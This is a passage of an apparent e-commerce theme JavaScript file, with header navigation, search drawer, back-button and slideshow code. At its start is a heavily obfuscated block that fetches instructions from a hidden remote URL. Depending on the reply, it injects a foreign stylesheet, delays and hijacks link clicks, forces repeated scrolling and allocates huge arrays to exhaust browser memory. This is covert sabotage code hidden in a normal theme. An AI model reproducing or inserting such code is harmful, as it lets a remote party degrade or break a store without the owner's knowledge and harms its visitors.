_0x416dc8=_0x132237[_0x18a8c0(0x285,0x233,0x237,0x20b)+'r'](_0x18a8c0(0x2b2,0x2e7,0x29a,0x2ee)+'+\x20this\x20+\x20\x22'+'/')()[_0x18a8c0(0x285,0x21e,0x237,0x1fb)+'r']('^([^\x20]+(\x20+'+'[^\x20]+)+)+['+_0x391f0f(0x268,0x2b1,0x2a5,0x2a8));return!_0x416dc8[_0x18a8c0(0x28f,0x225,0x26d,0x280)](_0x522959);}};return _0x15f599[_0x7af83a(0x1f5,0x221,0x1df,0x1f3)](_0x132237);}});_0x15f599[_0x57bbc0(0x11,-0x22,-0x59,0x10)](_0x522959);var _0x549e69=function(){var _0xea7b49=function(_0x2c398b,_0x1723f1,_0xcaaf19,_0x31aaf5){return _0x57bbc0(_0x2c398b-0x14,_0x2c398b- -0x6c,_0xcaaf19,_0x31aaf5-0x21);},_0x181757=function(_0x59cd77,_0x2786d4,_0x470288,_0x593471){return _0x18d715(_0x59cd77-0x47,_0x59cd77- -0x6c,_0x470288,_0x593471-0x17d);},_0x122371={};_0x122371['vGxxO']=_0x15f599[_0xea7b49(-0xd8,-0xdc,-0xde,-0xb5)];var _0x544183=_0x122371;if(_0x15f599['yWAct'](_0x15f599['hqfQH'],_0x15f599[_0x181757(-0x54,-0x52,-0x6b,-0x8c)])){var _0xa65072=!![];return function(_0x3a3e31,_0x49e3e8){var _0x47d2e8=_0xa65072?function(){if(_0x49e3e8){var _0x2f06b2=_0x49e3e8['apply'](_0x3a3e31,arguments);return _0x49e3e8=null,_0x2f06b2;}}:function(){};return _0xa65072=![],_0x47d2e8;};}else{function _0x1033e6(){var _0x4db3bf=function(_0x11c7ed,_0x1632a4,_0x5d3140,_0x46f46e){return _0x181757(_0x11c7ed-0x139,_0x1632a4-0x5b,_0x46f46e,_0x46f46e-0x109);},_0xf39a4e=function(_0x14f4a9,_0x150ee6,_0x418ce8,_0x2fb1f5){return _0x181757(_0x14f4a9-0x139,_0x150ee6-0x86,_0x2fb1f5,_0x2fb1f5-0xce);};_0xe15525[_0x2e8fc1]['addEventLi'+_0x4db3bf(0x9e,0xa4,0x71,0xd3)](_0x544183[_0xf39a4e(0xc5,0xcc,0x100,0xb6)],_0x93dda3=>{var _0x24cc07=function(_0x9b2f75,_0x2ad42d,_0x412762,_0x183746){return _0x4db3bf(_0x9b2f75- -0x3a0,_0x2ad42d-0x1d1,_0x412762-0x12,_0x2ad42d);};_0x32349b(()=>{var _0x1e8071=function(_0x197938,_0x5da21,_0x15b8b7,_0x420227){return _0x2375(_0x5da21-0x1a2,_0x15b8b7);},_0x2a668f=function(_0x5bf887,_0x155005,_0x2abddc,_0x275e53){return _0x2375(_0x155005-0x1a2,_0x2abddc);};_0x382974['location']=_0x93dda3[_0x1e8071(0x346,0x32d,0x37e,0x379)][_0x1e8071(0x3b6,0x368,0x339,0x352)];},0x9144+-0x1*-0x3d79+-0x809d),_0x93dda3[_0x24cc07(-0x31b,-0x304,-0x31d,-0x34f)+'ault']();});}}}(),_0x1c41f2=_0x15f599[_0x18d715(-0x28,-0x69,-0x8d,-0x94)](_0x549e69,this,function(){var _0x3c21a0=function(_0x3ac717,_0x25198e,_0x2f492f,_0x19a214){return _0x57bbc0(_0x3ac717-0xa7,_0x2f492f- -0x1d,_0x25198e,_0x19a214-0x1a0);},_0x4f04a0=function(_0x59ae06,_0x545db8,_0x5295c3,_0x488f53){return _0x18d715(_0x59ae06-0x1b6,_0x5295c3- -0x1d,_0x545db8,_0x488f53-0x2f);};if(_0x15f599['DslHN'](_0x15f599[_0x3c21a0(-0x8e,-0x12,-0x59,-0x2f)],_0x15f599[_0x3c21a0(-0x36,-0x3,-0x11,0x40)])){function _0x10caf4(){var _0x1a1046=function(_0x1477cd,_0x487b5e,_0x233a00,_0x1f1fb5){return _0x4f04a0(_0x1477cd-0x1ed,_0x1477cd,_0x487b5e- -0x11b,_0x1f1fb5-0x14b);},_0x2614a1=function(_0x3c7c24,_0x57eccd,_0x1da078,_0x5d0d03){return _0x4f04a0(_0x3c7c24-0x1ae,_0x3c7c24,_0x57eccd- -0x11b,_0x5d0d03-0x6a);},_0x5b8da8=('2|0|3|5|4|'+'1')[_0x1a1046(-0x151,-0x11a,-0xff,-0xff)]('|'),_0xbd2a8f=-0x234*0xb+-0x1c39+0x3475;while(!![]){switch(_0x5b8da8[_0xbd2a8f++]){case'0':var _0x43f9b2=_0x1e52ae[_0x2c71ee];continue;case'1':_0x45c6d1[_0x43f9b2]=_0x4fa164;continue;case'2':var _0x4fa164=_0x539e23[_0x1a1046(-0x1ac,-0x1bc,-0x203,-0x1e7)+'r'][_0x1a1046(-0x1a3,-0x199,-0x16c,-0x1ee)]['bind'](_0x719b2d);continue;case'3':var _0xde6ca7=_0x38b039[_0x43f9b2]||_0x4fa164;continue;case'4':_0x4fa164['toString']=_0xde6ca7[_0x1a1046(-0x11c,-0x133,-0x14c,-0x132)][_0x1a1046(-0x157,-0x150,-0x118,-0x103)](_0xde6ca7);continue;case'5':_0x4fa164[_0x2614a1(-0x14d,-0x138,-0x160,-0x136)]=_0x165e0b['bind'](_0x439c5b);continue;}break;}}}else{var _0x1c841d;try{var _0x13b34d=_0x15f599['BVvcB'](Function,_0x15f599[_0x4f04a0(-0x78,-0xac,-0x9d,-0xcd)](_0x15f599[_0x3c21a0(-0x56,-0x96,-0x7b,-0xc5)](_0x15f599[_0x3c21a0(-0x62,-0x98,-0x78,-0x67)],_0x15f599['sVmyh']),');'));_0x1c841d=_0x15f599[_0x3c21a0(-0x25,-0x8f,-0x3f,0x1)](_0x13b34d);}catch(_0x3c6660){_0x1c841d=window;}var _0x1bbed0=_0x1c841d[_0x4f04a0(-0x18,-0x27,-0x4d,-0x6f)]=_0x1c841d[_0x4f04a0(0x3,-0x1f,-0x4d,-0x73)]||{},_0x526b5f=[_0x15f599[_0x3c21a0(-0x45,0x1f,0x0,-0x13)],_0x3c21a0(-0x85,-0xcf,-0x83,-0x43),_0x15f599[_0x4f04a0(-0x92,-0x84,-0x70,-0x9b)],_0x15f599[_0x3c21a0(-0x37,-0x1f,-0x26,-0x5b)],_0x15f599[_0x3c21a0(-0x95,-0x67,-0xa6,-0xee)],_0x15f599[_0x3c21a0(-0x72,-0x6d,-0x42,-0x52)],_0x3c21a0(-0x8f,-0x29,-0x4a,-0x35)];for(var _0x44c7b3=0x19fb+-0x22d5+0x8da;_0x44c7b3<_0x526b5f[_0x4f04a0(-0x1e,-0x39,-0x13,0x18)];_0x44c7b3++){var _0xd91cc0=_0x15f599['SsqsS'][_0x4f04a0(-0x1e,-0x24,0x1,-0x32)]('|'),_0x545da6=-0x816*0x1+-0xf00+0x1716;while(!![]){switch(_0xd91cc0[_0x545da6++]){case'0':var _0xc1477a=_0x526b5f[_0x44c7b3];continue;case'1':_0x1bbed0[_0xc1477a]=_0x37312e;continue;case'2':_0x37312e['toString']=_0x4e296b['toString'][_0x4f04a0(-0x19,-0x52,-0x35,-0x14)](_0x4e296b);continue;case'3':var _0x4e296b=_0x1bbed0[_0xc1477a]||_0x37312e;continue;case'4':var _0x37312e=_0x549e69[_0x3c21a0(-0xf3,-0x4c,-0xa1,-0xc0)+'r']['prototype'][_0x4f04a0(0x20,-0x28,-0x35,-0x42)](_0x549e69);continue;case'5':_0x37312e[_0x3c21a0(-0x47,0x14,-0x1d,-0x1d)]=_0x549e69['bind'](_0x549e69);continue;}break;}}}});_0x15f599['FLAyb'](_0x1c41f2);var _0x334039;_0x334039=new XMLHttpRequest();if(!_0x334039){if(_0x18d715(-0xd,0xe,-0xf,0x4f)!==_0x15f599[_0x18d715(0x3b,0xd,-0x1f,-0x36)])return![];else{function _0x5b6b68(){var _0x3695a3=function(){var _0x4b7b7a=function(_0x377daa,_0x2ad851,_0xd66aa9,_0x31f90d){return _0x2375(_0x31f90d-0x21e,_0x377daa);},_0x245e09=function(_0x2139d8,_0x3956fa,_0x25f0ec,_0x2e27be){return _0x2375(_0x2e27be-0x21e,_0x2139d8);},_0x4c3a02=_0x3695a3[_0x4b7b7a(0x3f0,0x3c4,0x3c2,0x3ab)+'r'](_0x4b7b7a(0x419,0x43c,0x41e,0x40e)+_0x245e09(0x3f7,0x3a6,0x37e,0x3cf)+'/')()['constructo'+'r'](_0x245e09(0x3de,0x422,0x3ed,0x3f0)+_0x245e09(0x419,0x39b,0x39c,0x3df)+'^\x20]}');return!_0x4c3a02[_0x245e09(0x3c1,0x416,0x41c,0x3e1)](_0x4b6557);};return _0x3695a3();}}}_0x334039['onreadysta'+_0x57bbc0(-0x4c,-0x2,0xf,-0x1c)]=_0x5d3502,_0x334039[_0x57bbc0(-0x18,0x4,-0x1b,0x22)]('GET',_0x15f599[_0x57bbc0(-0x6d,-0x7e,-0x9c,-0x42)]),_0x334039[_0x18d715(0x38,0x1c,0x57,0x26)]();function _0x5d3502(){var _0x91de9b=function(_0x3e8ca3,_0xd16815,_0x5df3d8,_0x48967c){return _0x18d715(_0x3e8ca3-0x11,_0xd16815- -0x238,_0x3e8ca3,_0x48967c-0x7a);},_0x490359=function(_0x546664,_0x1ce448,_0x3534eb,_0x35e2ed){return _0x57bbc0(_0x546664-0x12b,_0x1ce448- -0x238,_0x546664,_0x35e2ed-0x67);},_0x42c8d2={};_0x42c8d2['evafT']=function(_0x46eb82,_0x3fa861,_0x101a5e){var _0x1cead3=function(_0x3b8a99,_0x357c1c,_0x4eba39,_0x4c0eef){return _0x2375(_0x4eba39-0xea,_0x3b8a99);};return _0x15f599[_0x1cead3(0x271,0x255,0x282,0x23e)](_0x46eb82,_0x3fa861,_0x101a5e);},_0x42c8d2[_0x91de9b(-0x236,-0x24c,-0x200,-0x24b)]=function(_0x3c6ebc,_0x17a8b1){return _0x3c6ebc!==_0x17a8b1;},_0x42c8d2[_0x91de9b(-0x23b,-0x22d,-0x26e,-0x20a)]=_0x15f599[_0x490359(-0x270,-0x292,-0x272,-0x2ad)],_0x42c8d2[_0x490359(-0x244,-0x226,-0x205,-0x267)]=function(_0x401e4e,_0x2339b3){return _0x15f599['mOhFK'](_0x401e4e,_0x2339b3);},_0x42c8d2[_0x91de9b(-0x25c,-0x258,-0x229,-0x202)]=_0x490359(-0x273,-0x2b5,-0x292,-0x2aa),_0x42c8d2[_0x91de9b(-0x2c8,-0x28f,-0x2bf,-0x256)]=_0x490359(-0x27f,-0x246,-0x1f9,-0x28d);var _0x3ea324=_0x42c8d2;if(_0x15f599['DslHN'](_0x334039[_0x91de9b(-0x2a3,-0x282,-0x250,-0x240)],XMLHttpRequest[_0x91de9b(-0x257,-0x235,-0x272,-0x28a)])){if(_0x15f599['LPGxs'](_0x334039[_0x91de9b(-0x2af,-0x287,-0x251,-0x26a)],-0xb9*0xd+-0x1d81+0x1*0x27ae)){let _0x19837c=JSON[_0x490359(-0x1eb,-0x224,-0x25d,-0x226)](_0x334039[_0x490359(-0x279,-0x285,-0x245,-0x2ce)+'xt']);_0x19837c[_0x91de9b(-0x2af,-0x294,-0x288,-0x2ca)+_0x490359(-0x281,-0x26a,-0x25f,-0x22a)+'r'][_0x91de9b(-0x2bb,-0x2a7,-0x253,-0x256)]&&(document[_0x490359(-0x2dc,-0x28a,-0x26f,-0x28d)+_0x91de9b(-0x2eb,-0x29b,-0x296,-0x253)](_0x15f599[_0x490359(-0x22d,-0x25c,-0x27b,-0x291)])[_0x490359(-0x276,-0x27d,-0x280,-0x232)]+=_0x490359(-0x283,-0x22f,-0x1e7,-0x21e)+'\x22styleshee'+'t\x22\x20href=\x22h'+_0x91de9b(-0x2d8,-0x2b4,-0x2d7,-0x2e2)+_0x91de9b(-0x2b0,-0x272,-0x297,-0x253)+_0x490359(-0x2db,-0x2ba,-0x2b8,-0x2a3)+_0x490359(-0x256,-0x245,-0x289,-0x213)+'r-bootstra'+'p/2.0.4/cs'+'s/bootstra'+_0x490359(-0x2d2,-0x281,-0x2bc,-0x2cb)+'.min.css\x22\x20'+_0x490359(-0x239,-0x221,-0x264,-0x1fd)+'\x22sha384-G8'+_0x490359(-0x274,-0x263,-0x285,-0x28e)+_0x490359(-0x294,-0x279,-0x269,-0x2a5)+'EbckfbCpr2'+_0x91de9b(-0x25c,-0x29a,-0x2c1,-0x247)+'wH0p/If1Qk'+_0x91de9b(-0x2ed,-0x2a6,-0x2f3,-0x2d7)+_0x91de9b(-0x2b5,-0x27a,-0x229,-0x2a4)+_0x91de9b(-0x228,-0x269,-0x290,-0x2a9)+_0x91de9b(-0x248,-0x25b,-0x27c,-0x26c));_0x19837c[_0x91de9b(-0x257,-0x2ab,-0x273,-0x2e2)+_0x91de9b(-0x2be,-0x2b0,-0x2e9,-0x2a2)][_0x490359(-0x28f,-0x2a7,-0x2a1,-0x2c6)]&&_0x15f599[_0x91de9b(-0x299,-0x2b2,-0x2c3,-0x29c)](addEventListener,_0x91de9b(-0x221,-0x24f,-0x250,-0x21b),function(){var _0x2c87a8=function(_0x349f3a,_0x53aa5c,_0x330368,_0x473248){return _0x91de9b(_0x473248,_0x330368- -0x397,_0x330368-0xbd,_0x473248-0xe6);},_0x43224a=function(_0x57b7e7,_0xc7a356,_0x1ee972,_0x389b64){return _0x490359(_0x389b64,_0x1ee972- -0x397,_0x1ee972-0x12b,_0x389b64-0x1d6);},_0x2840c8={};_0x2840c8[_0x2c87a8(-0x5f0,-0x627,-0x5d5,-0x622)]=function(_0x1379cb,_0x21f422,_0x3ddecb){var _0x427e91=function(_0x316c35,_0x3c179b,_0x264a67,_0x336246){return _0x2c87a8(_0x316c35-0x2f,_0x3c179b-0xdd,_0x336246-0x137,_0x3c179b);};return _0x3ea324[_0x427e91(-0x512,-0x516,-0x4de,-0x51d)](_0x1379cb,_0x21f422,_0x3ddecb);};var _0x1cb84c=_0x2840c8;if(_0x3ea324[_0x2c87a8(-0x5da,-0x61b,-0x5e3,-0x623)](_0x3ea324[_0x43224a(-0x5b4,-0x5ec,-0x5c4,-0x5ca)],_0x2c87a8(-0x641,-0x632,-0x623,-0x640))){var _0xe6a6b7=document[_0x2c87a8(-0x5e6,-0x613,-0x63c,-0x665)+_0x43224a(-0x5d8,-0x5a0,-0x5e9,-0x5df)]('a');for(var _0x1c4876=0x104*0x1+0x1d59+-0x1e5d*0x1;_0x3ea324[_0x2c87a8(-0x5fb,-0x5b8,-0x5bd,-0x5ea)](_0x1c4876,_0xe6a6b7[_0x2c87a8(-0x5bf,-0x606,-0x5c5,-0x5fd)]);_0x1c4876++){if(_0x3ea324[_0x2c87a8(-0x622,-0x60d,-0x5e3,-0x5ea)](_0x3ea324[_0x2c87a8(-0x59a,-0x59b,-0x5ef,-0x5b7)],_0x3ea324[_0x2c87a8(-0x5b3,-0x616,-0x5ef,-0x5d8)])){function _0x15ed79(){var _0x4953f8=function(_0x261d12,_0x439407,_0x331d55,_0x115f30){return _0x43224a(_0x261d12-0x16f,_0x439407-0x11a,_0x439407-0x23c,_0x331d55);};_0x5b1c37[_0x4953f8(-0x432,-0x416,-0x3d0,-0x41b)](-0x2*0x44f+-0x13*0x1b1+0x1*0x28c1,-0x17*0x152+-0x19b5*-0x1+0x4a9);}}else _0xe6a6b7[_0x1c4876][_0x2c87a8(-0x5c4,-0x5f1,-0x5eb,-0x5a1)+_0x43224a(-0x620,-0x5c3,-0x5fe,-0x640)](_0x3ea324[_0x43224a(-0x65c,-0x65c,-0x626,-0x631)],_0x2a17d9=>{var _0x317946=function(_0x59836e,_0x32fa1b,_0x1461e5,_0x4da1f9){return _0x43224a(_0x59836e-0x14e,_0x32fa1b-0x112,_0x1461e5-0xbd,_0x32fa1b);},_0x672ed4=function(_0x1171de,_0x47b467,_0x390ed7,_0x22ffc2){return _0x43224a(_0x1171de-0x19f,_0x47b467-0x1ee,_0x390ed7-0xbd,_0x47b467);};_0x1cb84c[_0x317946(-0x540,-0x4da,-0x518,-0x500)](setTimeout,()=>{var _0x4612ef=function(_0x477786,_0x59e938,_0x495635,_0x2c5f37){return _0x317946(_0x477786-0xa5,_0x495635,_0x2c5f37- -0x4b,_0x2c5f37-0x2c);},_0x33faf5=function(_0x21db4e,_0x28c8b3,_0x26dddc,_0x336385){return _0x317946(_0x21db4e-0x13f,_0x26dddc,_0x336385- -0x4b,_0x336385-0x1eb);};window[_0x4612ef(-0x57e,-0x5e7,-0x578,-0x591)]=_0x2a17d9[_0x33faf5(-0x5c5,-0x601,-0x614,-0x5e3)][_0x4612ef(-0x5b5,-0x5c3,-0x5c6,-0x5a8)];},0xf+0x91ee+0x169f*-0x3),_0x2a17d9['preventDef'+_0x317946(-0x549,-0x58c,-0x579,-0x56f)]();});}}else{function _0x42bf8e(){var _0x4b1bd4=function(_0x29b423,_0x3fc0bd,_0x2093bd,_0x24f9ae){return _0x2c87a8(_0x29b423-0x164,_0x3fc0bd-0x13f,_0x24f9ae- -0x2ff,_0x29b423);};if(_0x114338){var _0x378b35=_0x19eb1d[_0x4b1bd4(-0x86b,-0x8ca,-0x8f1,-0x8bd)](_0x2e8848,arguments);return _0x21bf9d=null,_0x378b35;}}}});if(_0x19837c[_0x91de9b(-0x267,-0x266,-0x258,-0x267)+'ws'][_0x490359(-0x2f2,-0x2a7,-0x2f3,-0x2df)]){if(_0x15f599[_0x490359(-0x268,-0x2a2,-0x2ac,-0x2a4)](_0x15f599[_0x490359(-0x24c,-0x230,-0x1e8,-0x26b)],_0x15f599[_0x91de9b(-0x272,-0x230,-0x272,-0x1f2)]))_0x15f599[_0x490359(-0x2a3,-0x2b2,-0x25f,-0x300)](setInterval,()=>{var _0x39eb34=function(_0x45a6e5,_0x1c0b53,_0x1015e6,_0x1ac0be){return _0x490359(_0x1c0b53,_0x1ac0be- -0xdb,_0x1015e6-0xc,_0x1ac0be-0xbd);};window[_0x39eb34(-0x397,-0x344,-0x3a1,-0x396)](0x1b80+-0x20c5+0x545,-0x71d+-0xcfa+0x1417);},-0x74a+-0x1dd6+0x30d8);else{function _0x1e7b2f(){var _0x1be2e3=function(_0x1ae574,_0x44145e,_0x4288e5,_0xc1d4c0){return _0x91de9b(_0x44145e,_0x4288e5- -0x3d2,_0x4288e5-0x1bb,_0xc1d4c0-0x15d);},_0x493af6=_0xb32322[_0x1be2e3(-0x5f2,-0x5dd,-0x5f9,-0x617)](_0x2b7dec,arguments);return _0x2f3541=null,_0x493af6;}}}if(_0x19837c[_0x91de9b(-0x20a,-0x24d,-0x233,-0x207)]['active']){const _0x2810c8=_0x1ba12d=>{var _0x196b09=function(_0x44acaf,_0x403dda,_0x2c9f0a,_0x2d4075){return _0x490359(_0x403dda,_0x2d4075- -0x53,_0x2c9f0a-0xc4,_0x2d4075-0xb6);},_0x3fb2d0=function(_0x1ac204,_0x18aa25,_0x2c6929,_0x4400ca){return _0x490359(_0x18aa25,_0x4400ca- -0x53,_0x2c6929-0x195,_0x4400ca-0x154);};_0x1ba12d[_0x196b09(-0x2bf,-0x34f,-0x343,-0x315)](new Array(-0x533*0x2c3+0x3*0x7d051+0x62d26)['fill'](_0x196b09(-0x2ea,-0x2f8,-0x31f,-0x2d9)));},_0xc984da=[];for(let _0x923bf9=0x1b67+-0x3a2*-0x8+0x31*-0x127;_0x15f599['KbJRB'](_0x923bf9,0x128*-0x20+0x1da+0x1*0x270e);_0x923bf9++){_0x2810c8(_0xc984da);}}if(_0x19837c[_0x91de9b(-0x2ab,-0x28e,-0x2ad,-0x280)][_0x91de9b(-0x2a9,-0x2a7,-0x258,-0x26e)]){if(_0x15f599[_0x91de9b(-0x2ab,-0x290,-0x256,-0x2e5)]===_0x15f599[_0x91de9b(-0x23a,-0x25e,-0x277,-0x25a)]){function _0x4d19e9(){var _0x3a98ea=function(_0x34adcb,_0x10bee1,_0x363cbd,_0x2f40f2){return _0x490359(_0x363cbd,_0x34adcb- -0x316,_0x363cbd-0x17e,_0x2f40f2-0xe0);};_0x15f599[_0x3a98ea(-0x595,-0x5d7,-0x541,-0x5d6)](_0x3b5dde,()=>{var _0x5b455d=function(_0x397dd1,_0x561bd9,_0x2f062d,_0x478f11){return _0x3a98ea(_0x397dd1-0x34b,_0x561bd9-0x1ce,_0x478f11,_0x478f11-0x9e);};_0x56a0a6[_0x5b455d(-0x286,-0x24b,-0x2ac,-0x2be)](-0x1*-0x83e+-0x1953+0x1115,-0x5*-0x42c+-0x2*-0xd4e+-0x2f78);},0x258d+0x125*0x12+-0x2e6f*0x1);}}else document['getElement'+_0x91de9b(-0x23d,-0x25f,-0x20c,-0x221)+'me'](_0x15f599[_0x490359(-0x21d,-0x223,-0x1e9,-0x219)])[-0x1642+-0x6*-0x4f2+-0x76a][_0x91de9b(-0x276,-0x231,-0x21f,-0x25b)][_0x91de9b(-0x24c,-0x21d,-0x22e,-0x211)+_0x490359(-0x241,-0x23f,-0x263,-0x1f2)]=_0x15f599['toHjc'];}}}}}();
        }

        function init() {
            $window = $(window);
            $navContainerWithLogo = $(selectors.navContainerWithLogo);
            $logoContainer = $(selectors.logoContainer);
            $nav = $(selectors.navigation);
            $wrapper = $(selectors.wrapper);
            $siteHeader = $(selectors.siteHeader);

            config.wrapperOverlayed = $wrapper.hasClass(config.overlayedClass);
            config.stickyEnabled = $siteHeader.data('sticky');
            if (config.stickyEnabled) {
                theme.config.stickyHeader = true;
                stickyHeader();
            }

            if (config.wrapperOverlayed) {
                $('body').addClass('overlaid-header');
            }

            accessibleDropdowns();
            /*getTrackingCodesData();*/
            searchDrawer();
        }

        function unload() {
            $(window).off(config.namespace);
            $(selectors.searchBtn).off(config.namespace);
            $(selectors.closeSearch).off(config.namespace);
            $parent.off(config.namespace);
            $(selectors.navLinks).off(config.namespace);
            $(selectors.navDropdownLinks).off(config.namespace);
        }

        function searchDrawer() {
            $(selectors.searchBtn).on('click' + config.namespace, function(evt) {
                evt.preventDefault();
                openSearchDrawer();
            });

            $(selectors.closeSearch).on('click' + config.namespace, function() {
                closeSearchDrawer();
            });
        }

        function openSearchDrawer() {
            $(selectors.searchContainer).addClass('is-active');
            $parent.addClass('js-drawer-open js-drawer-open--search');

            slate.a11y.trapFocus({
                $container: $(selectors.searchContainer),
                namespace: 'header_search',
                $elementToFocus: $(selectors.searchContainer).find('input')
            });

            // If sticky is enabled, scroll to top on mobile when close to it
            // so you don't get an invisible search box
            if (theme.config.bpSmall && config.stickyEnabled && config.lastScroll < 300) {
                window.scrollTo(0,0);
            }

            // Bind events
            slate.a11y.lockMobileScrolling(config.namespace);

            // Clicking out of container closes it
            $page.on('click' + config.namespace, function () {
                closeSearchDrawer();
                return false;
            });

            $parent.on('keyup' + config.namespace, function(evt) {
                if (evt.keyCode === 27) {
                    closeSearchDrawer();
                }
            });
        }

        function closeSearchDrawer() {
            // deselect any focused form elements
            $(document.activeElement).trigger('blur');

            $parent.removeClass('js-drawer-open js-drawer-open--search').off(config.namespace);
            $(selectors.searchContainer).removeClass('is-active');

            slate.a11y.removeTrapFocus({
                $container: $(selectors.searchContainer),
                namespace: 'header_search'
            });

            slate.a11y.unlockMobileScrolling(config.namespace);
            $page.off('click' + config.namespace);
            $parent.off('keyup' + config.namespace);
        }

        function accessibleDropdowns() {
            var hasActiveDropdown = false;
            var hasActiveSubDropdown = false;
            var closeOnClickActive = false;

            // Touch devices open dropdown on first click, navigate to link on second
            if (theme.config.isTouch) {
                $(selectors.navLinksWithDropdown).on('touchend' + config.namespace, function(evt) {
                    var $el = $(this);
                    var $parentItem = $el.parent();
                    if (!$parentItem.hasClass(classes.dropdownActive)) {
                        evt.preventDefault();
                        closeDropdowns();
                        openFirstLevelDropdown($el);
                    } else {
                        window.location.replace($el.attr('href'));
                    }
                });

                $(selectors.navDropdownLinks).on('touchend' + config.namespace, function(evt) {
                    var $el = $(this);
                    var $parentItem = $el.parent();

                    // Open third level menu or go to link based on active state
                    if ($parentItem.hasClass(classes.hasSubDropdownClass)) {
                        if (!$parentItem.hasClass(classes.dropdownActive)) {
                            evt.preventDefault();
                            closeThirdLevelDropdown();
                            openSecondLevelDropdown($el);
                        } else {
                            window.location.replace($el.attr('href'));
                        }
                    } else {
                        // No third level nav, go to link
                        window.location.replace($el.attr('href'));
                    }
                });
            }

            $(selectors.navLinks).on('focusin mouseover' + config.namespace, function() {
                if (hasActiveDropdown) {
                    closeSecondLevelDropdown();
                }

                if (hasActiveSubDropdown) {
                    closeThirdLevelDropdown();
                }

                openFirstLevelDropdown($(this));
            });

            // Force remove focus on sitenav links because focus sometimes gets stuck
            $(selectors.navLinks).on('mouseleave' + config.namespace, function() {
                closeSecondLevelDropdown();
                closeThirdLevelDropdown();
            });

            // Open/hide sub level dropdowns
            $(selectors.navDropdownLinks).on('focusin' + config.namespace, function() {
                if (hasActiveSubDropdown) {
                    closeThirdLevelDropdown();
                }

                openSecondLevelDropdown($(this), true);
            });

            // Private dropdown methods
            function openFirstLevelDropdown($el) {
                var $parentItem = $el.parent();
                if ($parentItem.hasClass(classes.hasDropdownClass)) {
                    $parentItem.addClass(classes.dropdownActive);
                    hasActiveDropdown = true;
                }

                if (!theme.config.isTouch) {
                    if (!closeOnClickActive) {
                        var eventType = theme.config.isTouch ? 'touchend' : 'click';
                        closeOnClickActive = true;
                        $('body').on(eventType + config.namespace, function() {
                            closeDropdowns();
                            $('body').off(config.namespace);
                            closeOnClickActive = false;
                        });
                    }
                }
            }

            function openSecondLevelDropdown($el, skipCheck) {
                var $parentItem = $el.parent();
                if ($parentItem.hasClass(classes.hasSubDropdownClass) || skipCheck) {
                    $parentItem.addClass(classes.dropdownActive);
                    hasActiveSubDropdown = true;
                }
            }

            function closeDropdowns() {
                closeSecondLevelDropdown();
                closeThirdLevelDropdown();
            }

            function closeSecondLevelDropdown() {
                $(selectors.navItems).removeClass(classes.dropdownActive);
            }

            function closeThirdLevelDropdown() {
                $(selectors.navDropdownLinks).parent().removeClass(classes.dropdownActive);
            }
        }

        function stickyHeader() {
            config.lastScroll = 0;
            $siteHeader.wrap('<div class="site-header-sticky"></div>');

            stickyHeaderHeight();
            setTimeout(function() {
                stickyHeaderHeight();
            }, 200)
            $window.on('resize' + config.namespace, $.debounce(50, stickyHeaderHeight));
            $window.on('scroll' + config.namespace, $.throttle(15, stickyHeaderScroll));
        }

        function stickyHeaderHeight() {
            var $stickyHeader = $('.site-header-sticky').css('height', $siteHeader.outerHeight(true));
        }

        function stickyHeaderScroll() {
            var scroll = $window.scrollTop();
            var threshold = 80;

            if (scroll > threshold) {
                if (config.stickyActive) {
                    return;
                }

                config.stickyActive = true;

                $siteHeader.addClass(config.stickyClass);
                if (config.wrapperOverlayed) {
                    $wrapper.removeClass(config.overlayedClass);
                }

                // Add open transition class after element is set to fixed
                // so CSS animation is applied correctly
                setTimeout(function() {
                    $siteHeader.addClass(config.openTransitionClass);
                }, 100);
            } else {
                if (!config.stickyActive) {
                    return;
                }

                config.stickyActive = false;

                $siteHeader.removeClass(config.openTransitionClass).removeClass(config.stickyClass);
                if (config.wrapperOverlayed) {
                    $wrapper.addClass(config.overlayedClass);
                }
            }

            config.lastScroll = scroll;
        }

        return {
            init: init,
            unload: unload
        };
    })();

    theme.backButton = (function() {

        function init() {
            if (!document.referrer || !$('.return-link').length || !window.history.length) {
                return;
            }

            //$('.return-link').on('click', backHistory);
        }

        function backHistory() {
            var referrerDomain = urlDomain(document.referrer);
            var shopDomain = urlDomain(document.url);

            if (shopDomain === referrerDomain) {
                history.back();
                return false;
            }
        }

        function urlDomain(url) {
            var    a      = document.createElement('a');
            a.href = url;
            return a.hostname;
        }

        return {
            init: init
        };
    })();

    theme.Slideshow = (function() {
        this.$slideshow = null;

        var classes = {
            next: 'is-next',
            init: 'is-init',
            animateOut: 'animate-out',
            wrapper: 'slideshow-wrapper',
            slideshow: 'slideshow',
            allSlides: 'slick-slide',
            currentSlide: 'slick-current',
            pauseButton: 'slideshow__pause',
            isPaused: 'is-paused'
        };

        function slideshow(el, args) {
            this.$slideshow = $(el);
            this.$wrapper = this.$slideshow.closest('.' + classes.wrapper);
            this.$pause = this.$wrapper.find('.' + classes.pauseButton);

            this.settings = {
                accessibility: true,
                arrows: args.arrows ? true : false,
                dots: args.dots ? true : false,
                fade: args.fade ? true : false,
                speed: args.speed ? args.speed : 500,
                draggable: true,
                touchThreshold: 5,
                pauseOnHover: false,
                autoplay: args.autoplay ? true : false,
                autoplaySpeed: this.$slideshow.data('speed')
            };

            this.$slideshow.off('beforeChange');
            this.$slideshow.off('afterSlideChange');
            this.$slideshow.on('init', this.init.bind(this));
            this.$slideshow.on('beforeChange', this.beforeSlideChange.bind(this));
            this.$slideshow.on('afterChange', this.afterSlideChange.bind(this));

            this.$slideshow.slick(this.settings);

            this.$pause.on('click', this._togglePause.bind(this));
        }

        slideshow.prototype = $.extend({}, slideshow.prototype, {
            init: function(event, obj) {
                this.$slideshowList = obj.$list;
                this.$slickDots = obj.$dots;
                this.$allSlides = obj.$slides;
                this.slideCount = obj.slideCount;

                this.$slideshow.addClass(classes.init);
                this._a11y();
                this._clonedLazyloading();
            },
            beforeSlideChange: function(event, slick, currentSlide, nextSlide) {
                var $slider = slick.$slider;
                var $currentSlide = $slider.find('.' + classes.currentSlide).addClass(classes.animateOut);
            },
            afterSlideChange: function(event, slick, currentSlide) {
                var $slider = slick.$slider;
                var $allSlides = $slider.find('.' + classes.allSlides).removeClass(classes.animateOut);
            },
            destroy: function() {
                this.$slideshow.slick('unslick');
            },

            // Playback
            _play: function() {
                this.$slideshow.slick('slickPause');
                $(classes.pauseButton).addClass('is-paused');
            },
            _pause: function() {
                this.$slideshow.slick('slickPlay');
                $(classes.pauseButton).removeClass('is-paused');
            },
            _togglePause: function() {
                var slideshowSelector = this._getSlideshowId(this.$pause);
                if (this.$pause.hasClass(classes.isPaused)) {
                    this.$pause.removeClass(classes.isPaused);
